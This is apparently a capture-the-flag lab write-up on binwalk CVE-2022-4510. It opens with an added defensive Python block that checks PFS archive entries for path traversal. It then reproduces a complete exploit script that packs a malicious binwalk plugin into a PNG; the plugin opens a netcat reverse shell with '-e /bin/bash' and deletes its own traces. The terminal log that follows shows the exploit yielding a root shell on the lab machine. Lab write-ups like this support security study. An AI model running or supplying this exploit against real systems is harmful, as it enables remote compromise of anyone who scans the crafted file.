CVE-2022-4510


A vulnerability was found in ReFirm binwalk up to 2.3.2 and has been declared critical. It affects an unknown part of the file src/binwalk/plugins/unpfs.py in the PFS Extractor component. Manipulation with an unknown input leads to a path traversal vulnerability, classified as CWE-22: the software uses external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory, but it does not properly neutralize special elements within the pathname, so the pathname can resolve to a location outside of the restricted directory. The known impact is on confidentiality, integrity, and availability.
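As an added example (not from the original write-up and not binwalk's own code), the following Python shows the containment check that closes a CWE-22 hole in an extractor, together with a small scanner that applies that check to the file names declared in a PFS/0.9 directory so a traversal entry is flagged before anything is written to disk. The PFS layout it assumes (a 16-byte header ending in a little-endian entry count, then per entry a NUL-padded name followed by 12 bytes of size/offset fields) is inferred from the payload bytes in the exploit script further down this page, not taken from unpfs.py; build_pfs and the SAMPLE_* values are constructed test data.

```python
"""Added example (not part of the original write-up or of binwalk): the
containment check an extractor needs to close CWE-22, applied to the file
names declared in a PFS/0.9 image *before* anything is written to disk."""
import posixpath
import struct

PFS_MAGIC = b"PFS/0.9\x00"
PFS_HEADER_SIZE = 16   # assumed: magic, 6 bytes padding, little-endian uint16 entry count
PFS_ENTRY_TAIL = 12    # assumed: 12 bytes of size/offset fields after each NUL-padded name


def is_contained(root, name):
    """True only if archive entry `name` resolves strictly inside `root`.

    posixpath is used so the answer is deterministic and touches no
    filesystem; a real extractor must also os.path.realpath() the path it is
    about to create, because an earlier entry may have planted a symlink.
    """
    if not name or "\x00" in name or posixpath.isabs(name):
        return False
    root = posixpath.normpath(root)
    target = posixpath.normpath(posixpath.join(root, name))
    # commonpath compares whole components, so /tmp/pfs-root2 is NOT inside
    # /tmp/pfs-root even though a plain string prefix test says it is.
    return target != root and posixpath.commonpath([root, target]) == root


def naive_prefix_check(root, name):
    """The common but insufficient variant: a string prefix test on the joined path."""
    return posixpath.normpath(posixpath.join(root, name)).startswith(root)


def pfs_entry_names(blob):
    """Names declared in every PFS/0.9 directory found in `blob`, in order.

    Layout is an assumption that matches the payload bytes shown on this
    page, not a reimplementation of binwalk's unpfs.py: a name field is the
    name plus its run of NUL padding, followed by PFS_ENTRY_TAIL bytes.
    """
    names, pos = [], 0
    while True:
        idx = blob.find(PFS_MAGIC, pos)
        if idx < 0:
            return names
        (count,) = struct.unpack_from("<H", blob, idx + PFS_HEADER_SIZE - 2)
        off = idx + PFS_HEADER_SIZE
        for _ in range(count):
            end = blob.find(b"\x00", off)
            if end < 0:
                return names            # truncated directory: stop parsing
            pad = end
            while pad < len(blob) and blob[pad] == 0:
                pad += 1                # skip the NUL padding of the name field
            names.append(blob[off:end].decode("latin-1"))
            off = pad + PFS_ENTRY_TAIL
        pos = idx + len(PFS_MAGIC)


def scan_for_traversal(blob, out_dir="/tmp/pfs-root"):
    """Entry names that would escape `out_dir` if extracted without the check."""
    return [n for n in pfs_entry_names(blob) if not is_contained(out_dir, n)]


def build_pfs(entries, pad=8):
    """Constructed sample builder for testing; emits the layout assumed above."""
    header = PFS_MAGIC + b"\x00" * 6 + struct.pack("<H", len(entries))
    directory, payload = b"", b""
    for name, data in entries:
        assert 0 < len(data) < 256, "keep the size field's first byte non-zero"
        start = len(payload)
        payload += data
        tail = struct.pack("<III", len(data), start, len(payload))
        directory += name.encode() + b"\x00" * pad + tail
    return header + directory + payload


# Constructed sample: a PNG signature as carrier, then a PFS directory mixing
# benign entries with the traversal name used by the public exploit.
SAMPLE_ENTRIES = [
    ("etc/config.txt", b"key=value\n"),
    ("lib/../bin/busybox", b"ELF?\n"),      # '..' that still stays inside the root
    ("../../../.config/binwalk/plugins/binwalk.py", b"import os\n"),
    ("/etc/passwd", b"root:x:0:0\n"),
]
SAMPLE_IMAGE = b"\x89PNG\r\n\x1a\n" + build_pfs(SAMPLE_ENTRIES)

if __name__ == "__main__":
    for name in pfs_entry_names(SAMPLE_IMAGE):
        print("OK      " if is_contained("/tmp/pfs-root", name) else "ESCAPES ", name)
```

Running the block lists each declared name with OK or ESCAPES; scan_for_traversal returns only the escaping ones, which is what a pre-extraction scanner or a YARA-style triage step on incoming firmware images would act on. Two design points matter for the fix itself: the check must run on the normalized joined path, not on the raw name, so that an in-root `lib/../bin` is accepted while `../../../.config/...` is not; and the comparison must be component-wise (posixpath.commonpath) rather than a string prefix, since `/tmp/pfs-root2` passes a startswith("/tmp/pfs-root") test. If the format has no legitimate need for `..` at all, rejecting any name containing a `..` component is the simpler and stricter policy.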

Exploit


While the initial PoC was disclosed in the official binwalk GitHub repo, a standalone Python script is also available:

import os
import inspect
import argparse
 
print("")
print("################################################")
print("------------------CVE-2022-4510----------------")
print("################################################")
print("--------Binwalk Remote Command Execution--------")
print("------Binwalk 2.1.2b through 2.3.2 included-----")
print("------------------------------------------------")
print("################################################")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("------------------Discovered by:----------------")
print("---------Q. Kaiser, ONEKEY Research Lab---------")
print("---------Exploit tested on debian 11------------")
print("################################################")
print("")
 
parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input .png file",default=1)
parser.add_argument("ip", help="Ip to nc listener",default=1)
parser.add_argument("port", help="Port to nc listener",default=1)
 
args = parser.parse_args()
            
if args.file and args.ip and args.port:
    header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e")
    lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n','    def init(self):\n','        if not os.path.exists("/tmp/.binwalk"):\n','            os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n','            with open("/tmp/.binwalk", "w") as f:\n','                f.write("1")\n','        else:\n','            os.remove("/tmp/.binwalk")\n', '            os.remove(os.path.abspath(__file__))\n','            shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n']
 
    in_file = open(args.file, "rb")
    data = in_file.read()
    in_file.close()
    
    with open("/tmp/plugin", "w") as f:
       for line in lines:
          f.write(line)
 
    with open("/tmp/plugin", "rb") as f: 
        content = f.read()
 
    os.system("rm /tmp/plugin")
 
    with open("binwalk_exploit.png", "wb") as f:
        f.write(data)
        f.write(header_pfs)
        f.write(content)
 
    print("")    
    print("You can now rename and share binwalk_exploit and start your local netcat listener.")
    print("")

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-4510]
└─$ nc $IP 2222 < CVE-2022-4510.py
 
emily@pilgrimage:~$ nc -nlvp 2222 > CVE-2022-4510.py
listening on [any] 2222 ...
connect to [10.10.11.219] from (UNKNOWN) [10.10.14.4] 54546

Delivery complete

emily@pilgrimage:~$ python3 CVE-2022-4510.py -h
 
[...REDACTED...]
 
usage: CVE-2022-4510.py [-h] file ip port
 
positional arguments:
  file        Path to input .png file
  ip          Ip to nc listener
  port        Port to nc listener
 
optional arguments:
  -h, --help  show this help message and exit

The exploit requires an arbitrary PNG file to carry the reverse-shell payload

emily@pilgrimage:~$ touch abc.png

So I will just make one

emily@pilgrimage:~$ python3 CVE-2022-4510.py abc.png 10.10.14.4 1234
 
[...REDACTED...]
 
You can now rename and share binwalk_exploit and start your local netcat listener.

It says that I can now rename and share binwalk_exploit, and start a Netcat listener

It indeed generated the exploit PNG payload

emily@pilgrimage:~$ cp binwalk_exploit.png /var/www/pilgrimage.htb/shrunk/

Moving the payload to where the malwarescan.sh script is running

┌──(kali㉿kali)-[~/archive/htb/labs/pilgrimage]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.219] 51952
whoami
root
hostname
pilgrimage
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:be:8c brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.219/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever

System Level Compromise